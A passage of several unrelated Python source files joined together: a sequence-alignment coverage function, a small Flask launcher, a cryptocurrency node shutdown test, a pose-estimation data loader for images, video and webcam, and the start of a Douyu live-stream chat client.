else:
output[f"{start}-{current}"] = val
start = k
current = k
val = coverage[k]
output[f"{start}-{current}"] = val
return output
@staticmethod
def calculate_alignment_coverage(alignment_data):
ref_len = alignment_data['ref_seq_len']
# Setup. Can be implemented more cleanly.
coverage = defaultdict(lambda: 0)
output = {
'ref_seq_len': ref_len,
'total_read_length': 0,
'total_aligned_length': 0,
'total_mismatched_length': 0,
'num_reads': 0
}
if ref_len == 0:
return output
reads = alignment_data['reads']
for read in reads:
seq = read[1]
m8_metrics = read[2]
ref_start = int(m8_metrics[-4])
ref_end = int(m8_metrics[-3])
if ref_start > ref_end: # SWAP
ref_start, ref_end = ref_end, ref_start
ref_start -= 1
output['total_read_length'] += len(seq)
output['total_aligned_length'] += (ref_end - ref_start)
output['total_mismatched_length'] += int(m8_metrics[2])
output['num_reads'] += 1
for bp in range(ref_start, ref_end):
coverage[bp] += 1
output['distinct_covered_length'] = len(coverage)
output[
'coverage'] = PipelineStepGenerateAlignmentViz.compress_coverage(
coverage)
return output
|
main.py
|
from flask import Flask
from flask_restful import Api
from ressources import Bluetooth,task
import threading
app = Flask(__name__)
api = Api(app)
api.add_resource(Bluetooth, '/');
def first_func():
app.run()
def second_func():
task.main()
if __name__ == '__main__':
first_thread = threading.Thread(target=first_func)
second_thread = threading.Thread(target=second_func)
first_thread.start()
second_thread.start()
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Picscoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test picscoind shutdown."""
from test_framework.test_framework import PicscoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(PicscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2)
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
dataloader copy.py
|
import os
import torch
from torch.autograd import Variable
import torch.utils.data as data
import torchvision.transforms as transforms
from PIL import Image, ImageDraw
from SPPE.src.utils.img import load_image, cropBox, im_to_torch
from opt import opt
from yolo.preprocess import prep_image, prep_frame, inp_to_image
from pPose_nms import pose_nms, write_json
from matching import candidate_reselect as matching
from SPPE.src.utils.eval import getPrediction, getMultiPeakPrediction
from yolo.util import write_results, dynamic_write_results
from yolo.darknet import Darknet
from tqdm import tqdm
import cv2
import json
import numpy as np
import sys
import time
import torch.multiprocessing as mp
from multiprocessing import Process
from multiprocessing import Queue as pQueue
from threading import Thread
# import the Queue class from Python 3
if sys.version_info >= (3, 0):
from queue import Queue, LifoQueue
# otherwise, import the Queue class for Python 2.7
else:
from Queue import Queue, LifoQueue
if opt.vis_fast:
from fn import vis_frame_fast as vis_frame
else:
from fn import vis_frame
class Image_loader(data.Dataset):
def __init__(self, im_names, format='yolo'):
super(Image_loader, self).__init__()
self.img_dir = opt.inputpath
self.imglist = im_names
self.transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
self.format = format
def getitem_ssd(self, index):
im_name = self.imglist[index].rstrip('\n').rstrip('\r')
im_name = os.path.join(self.img_dir, im_name)
im = Image.open(im_name)
inp = load_image(im_name)
if im.mode == 'L':
im = im.convert('RGB')
ow = oh = 512
im = im.resize((ow, oh))
im = self.transform(im)
return im, inp, im_name
def getitem_yolo(self, index):
inp_dim = int(opt.inp_dim)
im_name = self.imglist[index].rstrip('\n').rstrip('\r')
im_name = os.path.join(self.img_dir, im_name)
im, orig_img, im_dim = prep_image(im_name, inp_dim)
#im_dim = torch.FloatTensor([im_dim]).repeat(1, 2)
inp = load_image(im_name)
return im, inp, orig_img, im_name, im_dim
def __getitem__(self, index):
if self.format == 'ssd':
return self.getitem_ssd(index)
elif self.format == 'yolo':
return self.getitem_yolo(index)
else:
raise NotImplementedError
def __len__(self):
return len(self.imglist)
class ImageLoader:
def __init__(self, im_names, batchSize=1, format='yolo', queueSize=50):
self.img_dir = opt.inputpath
self.imglist = im_names
self.transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
self.format = format
self.batchSize = batchSize
self.datalen = len(self.imglist)
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store data
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = mp.Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
if self.format == 'ssd':
if opt.sp:
p = Thread(target=self.getitem_ssd, args=())
else:
p = mp.Process(target=self.getitem_ssd, args=())
elif self.format == 'yolo':
if opt.sp:
p = Thread(target=self.getitem_yolo, args=())
else:
p = mp.Process(target=self.getitem_yolo, args=())
else:
raise NotImplementedError
p.daemon = True
p.start()
return self
def getitem_ssd(self):
length = len(self.imglist)
for index in range(length):
im_name = self.imglist[index].rstrip('\n').rstrip('\r')
im_name = os.path.join(self.img_dir, im_name)
im = Image.open(im_name)
inp = load_image(im_name)
if im.mode == 'L':
im = im.convert('RGB')
ow = oh = 512
im = im.resize((ow, oh))
im = self.transform(im)
while self.Q.full():
time.sleep(2)
self.Q.put((im, inp, im_name))
def getitem_yolo(self):
for i in range(self.num_batches):
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
inp_dim = int(opt.inp_dim)
im_name_k = self.imglist[k].rstrip('\n').rstrip('\r')
im_name_k = os.path.join(self.img_dir, im_name_k)
img_k, orig_img_k, im_dim_list_k = prep_image(im_name_k, inp_dim)
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(im_name_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list_ = im_dim_list
while self.Q.full():
time.sleep(2)
self.Q.put((img, orig_img, im_name, im_dim_list))
def getitem(self):
return self.Q.get()
def length(self):
return len(self.imglist)
def len(self):
return self.Q.qsize()
class VideoLoader:
def __init__(self, path, batchSize=1, queueSize=50):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.path = path
self.stream = cv2.VideoCapture(path)
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
self.batchSize = batchSize
self.datalen = int(self.stream.get(cv2.CAP_PROP_FRAME_COUNT))
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = mp.Queue(maxsize=queueSize)
def length(self):
return self.datalen
def start(self):
# start a thread to read frames from the file video stream
if opt.sp:
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
else:
p = mp.Process(target=self.update, args=())
p.daemon = True
p.start()
return self
def update(self):
stream = cv2.VideoCapture(self.path)
assert stream.isOpened(), 'Cannot capture source'
for i in range(self.num_batches):
img = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
inp_dim = int(opt.inp_dim)
(grabbed, frame) = stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.Q.put((None, None, None, None))
print('===========================> This video get '+str(k)+' frames in total.')
sys.stdout.flush()
return
# process and add the frame to the queue
img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
img.append(img_k)
orig_img.append(orig_img_k)
im_name.append(str(k)+'.jpg')
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
# Human Detection
img = torch.cat(img)
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list_ = im_dim_list
while self.Q.full():
time.sleep(2)
self.Q.put((img, orig_img, im_name, im_dim_list))
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def getitem(self):
# return next frame in the queue
return self.Q.get()
def len(self):
return self.Q.qsize()
class DetectionLoader:
def __init__(self, dataloder, batchSize=1, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
self.det_inp_dim = int(self.det_model.net_info['height'])
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stopped = False
self.dataloder = dataloder
self.batchSize = batchSize
self.datalen = self.dataloder.length()
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store frames read from
# the video file
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = mp.Queue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
if opt.sp:
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
else:
p = mp.Process(target=self.update, args=())
p.daemon = True
p.start()
return self
def update(self):
# keep looping the whole dataset
for i in range(self.num_batches):
img, orig_img, im_name, im_dim_list = self.dataloder.getitem()
if img is None:
self.Q.put((None, None, None, None, None, None, None))
return
with torch.no_grad():
# Human Detection
img = img.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction, opt.confidence,
opt.num_classes, nms=True, nms_conf=opt.nms_thesh)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(orig_img)):
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None, None, None))
continue
dets = dets.cpu()
im_dim_list = torch.index_select(im_dim_list,0, dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list, 1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0, im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0, im_dim_list[j, 1])
boxes = dets[:, 1:5]
scores = dets[:, 5:6]
for k in range(len(orig_img)):
boxes_k = boxes[dets[:,0]==k]
if isinstance(boxes_k, int) or boxes_k.shape[0] == 0:
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], None, None, None, None, None))
continue
inps = torch.zeros(boxes_k.size(0), 3, opt.inputResH, opt.inputResW)
pt1 = torch.zeros(boxes_k.size(0), 2)
pt2 = torch.zeros(boxes_k.size(0), 2)
if self.Q.full():
time.sleep(2)
self.Q.put((orig_img[k], im_name[k], boxes_k, scores[dets[:,0]==k], inps, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class DetectionProcessor:
def __init__(self, detectionLoader, queueSize=1024):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.detectionLoader = detectionLoader
self.stopped = False
self.datalen = self.detectionLoader.datalen
# initialize the queue used to store data
if opt.sp:
self.Q = Queue(maxsize=queueSize)
else:
self.Q = pQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
if opt.sp:
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
else:
p = mp.Process(target=self.update, args=())
p.daemon = True
p.start()
return self
def update(self):
# keep looping the whole dataset
for i in range(self.datalen):
with torch.no_grad():
(orig_img, im_name, boxes, scores, inps, pt1, pt2) = self.detectionLoader.read()
if orig_img is None:
self.Q.put((None, None, None, None, None, None, None))
return
if boxes is None or boxes.nelement() == 0:
while self.Q.full():
time.sleep(0.2)
self.Q.put((None, orig_img, im_name, boxes, scores, None, None))
continue
inp = im_to_torch(cv2.cvtColor(orig_img, cv2.COLOR_BGR2RGB))
inps, pt1, pt2 = crop_from_dets(inp, boxes, inps, pt1, pt2)
while self.Q.full():
time.sleep(0.2)
self.Q.put((inps, orig_img, im_name, boxes, scores, pt1, pt2))
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue len
return self.Q.qsize()
class VideoDetectionLoader:
def __init__(self, path, batchSize=4, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.det_model = Darknet("yolo/cfg/yolov3-spp.cfg")
self.det_model.load_weights('models/yolo/yolov3-spp.weights')
self.det_model.net_info['height'] = opt.inp_dim
self.det_inp_dim = int(self.det_model.net_info['height'])
assert self.det_inp_dim % 32 == 0
assert self.det_inp_dim > 32
self.det_model.cuda()
self.det_model.eval()
self.stream = cv2.VideoCapture(path)
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
self.batchSize = batchSize
self.datalen = int(self.stream.get(cv2.CAP_PROP_FRAME_COUNT))
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
# initialize the queue used to store frames read from
# the video file
self.Q = Queue(maxsize=queueSize)
def length(self):
return self.datalen
def len(self):
return self.Q.qsize()
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping the whole video
for i in range(self.num_batches):
img = []
inp = []
orig_img = []
im_name = []
im_dim_list = []
for k in range(i*self.batchSize, min((i + 1)*self.batchSize, self.datalen)):
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
# process and add the frame to the queue
inp_dim = int(opt.inp_dim)
img_k, orig_img_k, im_dim_list_k = prep_frame(frame, inp_dim)
inp_k = im_to_torch(orig_img_k)
img.append(img_k)
inp.append(inp_k)
orig_img.append(orig_img_k)
im_dim_list.append(im_dim_list_k)
with torch.no_grad():
ht = inp[0].size(1)
wd = inp[0].size(2)
# Human Detection
img = Variable(torch.cat(img)).cuda()
im_dim_list = torch.FloatTensor(im_dim_list).repeat(1,2)
im_dim_list = im_dim_list.cuda()
prediction = self.det_model(img, CUDA=True)
# NMS process
dets = dynamic_write_results(prediction, opt.confidence,
opt.num_classes, nms=True, nms_conf=opt.nms_thesh)
if isinstance(dets, int) or dets.shape[0] == 0:
for k in range(len(inp)):
while self.Q.full():
time.sleep(0.2)
self.Q.put((inp[k], orig_img[k], None, None))
continue
im_dim_list = torch.index_select(im_dim_list,0, dets[:, 0].long())
scaling_factor = torch.min(self.det_inp_dim / im_dim_list, 1)[0].view(-1, 1)
# coordinate transfer
dets[:, [1, 3]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 0].view(-1, 1)) / 2
dets[:, [2, 4]] -= (self.det_inp_dim - scaling_factor * im_dim_list[:, 1].view(-1, 1)) / 2
dets[:, 1:5] /= scaling_factor
for j in range(dets.shape[0]):
dets[j, [1, 3]] = torch.clamp(dets[j, [1, 3]], 0.0, im_dim_list[j, 0])
dets[j, [2, 4]] = torch.clamp(dets[j, [2, 4]], 0.0, im_dim_list[j, 1])
boxes = dets[:, 1:5].cpu()
scores = dets[:, 5:6].cpu()
for k in range(len(inp)):
while self.Q.full():
time.sleep(0.2)
self.Q.put((inp[k], orig_img[k], boxes[dets[:,0]==k], scores[dets[:,0]==k]))
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def read(self):
# return next frame in the queue
return self.Q.get()
def more(self):
# return True if there are still frames in the queue
return self.Q.qsize() > 0
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class WebcamLoader:
def __init__(self, webcam, queueSize=256):
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoCapture(int(webcam))
assert self.stream.isOpened(), 'Cannot capture source'
self.stopped = False
# initialize the queue used to store frames read from
# the video file
self.Q = LifoQueue(maxsize=queueSize)
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
while True:
# otherwise, ensure the queue has room in it
if not self.Q.full():
# read the next frame from the file
(grabbed, frame) = self.stream.read()
# if the `grabbed` boolean is `False`, then we have
# reached the end of the video file
if not grabbed:
self.stop()
return
# process and add the frame to the queue
inp_dim = int(opt.inp_dim)
img, orig_img, dim = prep_frame(frame, inp_dim)
inp = im_to_torch(orig_img)
im_dim_list = torch.FloatTensor([dim]).repeat(1, 2)
self.Q.put((img, orig_img, inp, im_dim_list))
else:
with self.Q.mutex:
self.Q.queue.clear()
def videoinfo(self):
# indicate the video info
fourcc=int(self.stream.get(cv2.CAP_PROP_FOURCC))
fps=self.stream.get(cv2.CAP_PROP_FPS)
frameSize=(int(self.stream.get(cv2.CAP_PROP_FRAME_WIDTH)),int(self.stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
return (fourcc,fps,frameSize)
def read(self):
# return next frame in the queue
return self.Q.get()
def len(self):
# return queue size
return self.Q.qsize()
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
class DataWriter:
def __init__(self, save_video=False,
savepath='examples/res/1.avi', fourcc=cv2.VideoWriter_fourcc(*'XVID'), fps=25, frameSize=(640,480),
queueSize=1024):
if save_video:
# initialize the file video stream along with the boolean
# used to indicate if the thread should be stopped or not
self.stream = cv2.VideoWriter(savepath, fourcc, fps, frameSize)
assert self.stream.isOpened(), 'Cannot open video for writing'
self.save_video = save_video
self.stopped = False
self.final_result = []
# initialize the queue used to store frames read from
# the video file
self.Q = Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
def start(self):
# start a thread to read frames from the file video stream
t = Thread(target=self.update, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely
while True:
# if the thread indicator variable is set, stop the
# thread
if self.stopped:
if self.save_video:
self.stream.release()
return
# otherwise, ensure the queue is not empty
if not self.Q.empty():
(boxes, scores, hm_data, pt1, pt2, orig_img, im_name) = self.Q.get()
orig_img = np.array(orig_img, dtype=np.uint8)
if boxes is None:
if opt.save_img or opt.save_video or opt.vis:
img = orig_img
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(os.path.join(opt.outputpath, 'vis', im_name), img)
if opt.save_video:
self.stream.write(img)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
if opt.matching:
preds = getMultiPeakPrediction(
hm_data, pt1.numpy(), pt2.numpy(), opt.inputResH, opt.inputResW, opt.outputResH, opt.outputResW)
result = matching(boxes, scores.numpy(), preds)
else:
preds_hm, preds_img, preds_scores = getPrediction(
hm_data, pt1, pt2, opt.inputResH, opt.inputResW, opt.outputResH, opt.outputResW)
result = pose_nms(
boxes, scores, preds_img, preds_scores)
result = {
'imgname': im_name,
'result': result
}
self.final_result.append(result)
if opt.save_img or opt.save_video or opt.vis:
img = vis_frame(orig_img, result)
if opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if opt.save_img:
cv2.imwrite(os.path.join(opt.outputpath, 'vis', im_name), img)
if opt.save_video:
self.stream.write(img)
else:
time.sleep(0.1)
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
return not self.Q.empty()
def save(self, boxes, scores, hm_data, pt1, pt2, orig_img, im_name):
# save next frame in the queue
self.Q.put((boxes, scores, hm_data, pt1, pt2, orig_img, im_name))
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
time.sleep(0.2)
def results(self):
# return final result
return self.final_result
def len(self):
# return queue len
return self.Q.qsize()
class Mscoco(data.Dataset):
def __init__(self, train=True, sigma=1,
scale_factor=(0.2, 0.3), rot_factor=40, label_type='Gaussian'):
self.img_folder = '../data/coco/images' # root image folders
self.is_train = train # training set or test set
self.inputResH = opt.inputResH
self.inputResW = opt.inputResW
self.outputResH = opt.outputResH
self.outputResW = opt.outputResW
self.sigma = sigma
self.scale_factor = scale_factor
self.rot_factor = rot_factor
self.label_type = label_type
self.nJoints_coco = 17
self.nJoints_mpii = 16
self.nJoints = 33
self.accIdxs = (1, 2, 3, 4, 5, 6, 7, 8,
9, 10, 11, 12, 13, 14, 15, 16, 17)
self.flipRef = ((2, 3), (4, 5), (6, 7),
(8, 9), (10, 11), (12, 13),
(14, 15), (16, 17))
def __getitem__(self, index):
pass
def __len__(self):
pass
def crop_from_dets(img, boxes, inps, pt1, pt2):
'''
Crop human from origin image according to Dectecion Results
'''
imght = img.size(1)
imgwidth = img.size(2)
tmp_img = img
tmp_img[0].add_(-0.406)
tmp_img[1].add_(-0.457)
tmp_img[2].add_(-0.480)
for i, box in enumerate(boxes):
upLeft = torch.Tensor(
(float(box[0]), float(box[1])))
bottomRight = torch.Tensor(
(float(box[2]), float(box[3])))
ht = bottomRight[1] - upLeft[1]
width = bottomRight[0] - upLeft[0]
scaleRate = 0.3
upLeft[0] = max(0, upLeft[0] - width * scaleRate / 2)
upLeft[1] = max(0, upLeft[1] - ht * scaleRate / 2)
bottomRight[0] = max(
min(imgwidth - 1, bottomRight[0] + width * scaleRate / 2), upLeft[0] + 5)
bottomRight[1] = max(
min(imght - 1, bottomRight[1] + ht * scaleRate / 2), upLeft[1] + 5)
try:
inps[i] = cropBox(tmp_img.clone(), upLeft, bottomRight, opt.inputResH, opt.inputResW)
except IndexError:
print(tmp_img.shape)
print(upLeft)
print(bottomRight)
print('===')
pt1[i] = upLeft
pt2[i] = bottomRight
return inps, pt1, pt2
|
douyu_danmaku_assistant.py
|
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import socket
import struct
import hashlib
import threading
import urllib
import urllib2
import json
import uuid
import time
import sys
import re
__author__ = 'JingqiWang'
reload(sys)
sys.setdefaultencoding('utf-8')
def welcome():
def filter_tag(tag):
return tag.name == 'a' and tag.has_attr('href') and tag.has_attr('title') and tag.get('href').count('/') == 1 and 'directory' not in tag.get('href') and len(tag.get('href')) > 1
rooms = []
url = 'http://www.douyutv.com/directory/all'
request = urllib2.Request(url)
response = urllib2.urlopen(request)
page = response.read()
soup = BeautifulSoup(page, 'html.parser')
cnt = 1
for item in soup.find_all(filter_tag):
roomid = item['href'][1:]
title = item['title']
category = item.find_all('span', class_='tag ellipsis')[0].text
ownername = item.find_all('span', class_='dy-name ellipsis fl')[0].text
rooms.append({'id': cnt, 'rid': roomid, 'title': title, 'oname': ownername, 'cate': category})
print '\033[1m%s. 房间号: %s, 房间名: %s, 主播:\033[0m \033[1;31m%s\033[0m, \033[1m分类: %s\033[0m' % (cnt, roomid, title, ownername, category)
print '-' * 100
cnt += 1
return cnt, rooms
class DouyuDanmakuClient:
def __init__(self, cnt, rooms):
self.devid, self.gid, self.rid, self.rt, self.username, self.vk = None, None, None, None, None, None
self.cnt = cnt
self.rooms = rooms
self.danmaku_host = '111.161.35.131'
self.danmaku_port = 8601
self.danmaku_auth_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.danmaku_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.danmaku_socket.connect((self.danmaku_host, self.danmaku_port))
def run(self):
self.login()
t_keeplive = threading.Thread(target=self.keeplive)
t_keeplive.setDaemon(True)
t_keeplive.start()
self.get_danmaku()
def login(self):
while True:
self.rid = raw_input(u'\033[1m请输入房间号或序号: \033[0m')
if self.rid in ('exit', 'quit'):
sys.exit()
elif self.rid.isdigit() and 0 < int(self.rid) <= self.cnt - 1:
self.rid = self.rooms[int(self.rid) - 1]['rid']
url = 'http://www.douyutv.com/' + self.rid
try:
page = urllib.urlopen(url).read()
room_info = re.search('var \$ROOM = (.+);', page).group(1)
auth_servers = re.search('\"server_config\":\"(.+)\",\"', page).group(1)
auth_servers = urllib.unquote_plus(auth_servers)
auth_servers = json.loads(auth_servers)
# auth_host, auth_port = auth_servers[0]['ip'], auth_servers[0]['port']
room_info = json.loads(room_info)
self.rid = room_info['room_id']
self.danmaku_auth_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.danmaku_auth_socket.connect((auth_servers[0]['ip'], int(auth_servers[0]['port'])))
self.send_auth_loginreq_msg()
response = self.danmaku_auth_socket.recv(65535)
if re.search('\/live_stat@=(.+?)\/is_illegal', response).group(1) == '0':
print u'\033[1;31m[错误] 啊哦,主播正在赶来的路上,先去其他的房间打个酱油吧...\033[0m'
continue
else:
self.username = re.search('\/username@=(.+)\/nickname', response).group(1)
response = self.danmaku_auth_socket.recv(65535)
self.gid = re.search('\/gid@=(\d+)\/', response).group(1)
self.send_qrl_msg()
response = self.danmaku_auth_socket.recv(65535)
self.send_auth_keeplive_msg()
# response = self.danmaku_auth_socket.recv(65535)
break
except:
print u'\033[1;31m[错误] 请输入正确的房间号\033[0m'
def get_danmaku(self):
self.send_loginreq_msg()
response = self.danmaku_socket.recv(65535)
self.send_joingroup_msg()
# response = self.danmaku_socket.recv(65535)
while True:
response = self.danmaku_socket.recv(65535)
try:
dtype = re.search('type@=(.+?)\/', response).group(1)
except:
print '\033[1;31m[错误] 啊哦,出现了未知错误...\033[0m'
continue
if dtype == 'error':
print '\033[1;31m[错误] 啊哦,出现了未知错误...\033[0m'
elif dtype == 'upgrade':
nickname = re.search('\/nn@=(.+?)\/', response).group(1)
level = re.search('\/level@=(.+?)\/', response).group(1)
print '\033[1;36m[信息]\033[0m \033[1;33m%s\033[0m \033[1m这货悄悄地升到了%s级\033[0m' % (nickname, level)
elif dtype == 'blackres':
limittime, administrator, nickname = re.search('\/limittime@=(.+)\/snick@=(.+?)/dnick(.+?)\/', response).groups()
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;33m%s\033[0m \033[1m被管理员\033[0m \033[1;31m%s\033[0m \033[1m禁言%s小时\033[0m' % (nickname, administrator, int(limittime) / 3600)
elif dtype == 'uenter':
nickname = re.search('\/nn@=(.+?)\/', response).group(1)
level = re.search('\/level@=(.+?)\/', response).group(1)
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m进入房间\033[0m' % (level, nickname)
elif dtype == 'userenter':
nickname = re.search('Snick@A=(.+?)@Srg', response).group(1)
level = re.search('@Slevel@A=(.+?)@', response).group(1)
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m进入房间\033[0m' % (level, nickname)
elif dtype == 'dgb':
gfid, number, uid, nickname = re.search('\/gfid@=(.+)\/gs@=(.+)\/uid@=(.+)\/nn@=(.+?)\/', response).groups()
level = re.search('\/level@=(.+?)\/', response).group(1)
if gfid == '50':
try:
hit = re.search('\/hits@=(.+)\/', response).group(1)
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个赞,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, number, hit)
except:
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个赞\033[0m' % (level, nickname, number)
else:
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个鱼丸\033[0m' % (level, nickname, int(number) * 100)
elif dtype == 'dgn':
gfid = re.search('\/gfid@=(.+?)\/gs', response).group(1)
number, hits = re.search('\/gfcnt@=(.+?)\/hits@=(.+?)\/', response).groups()
nickname = re.search('\/src_ncnm@=(.+?)\/rid', response).group(1)
level = re.search('\/level@=(.+?)\/', response).group(1)
if gfid == '50':
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个鱼丸,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, int(number) * 100, hits)
elif gfid == '57':
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个赞,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, number, hits)
elif gfid == '53':
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个鱼丸,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, int(number) * 520, hits)
elif gfid == '52':
print '\033[1;36m[信息]\033[0m \033[1m用户\033[0m \033[1;32m[LV %s]\033[0m \033[1;33m%s\033[0m \033[1m送给主播%s个666,\033[0m \033[1;31m%s连击\033[0m' % (level, nickname, number, hits)
if gfid == '143':
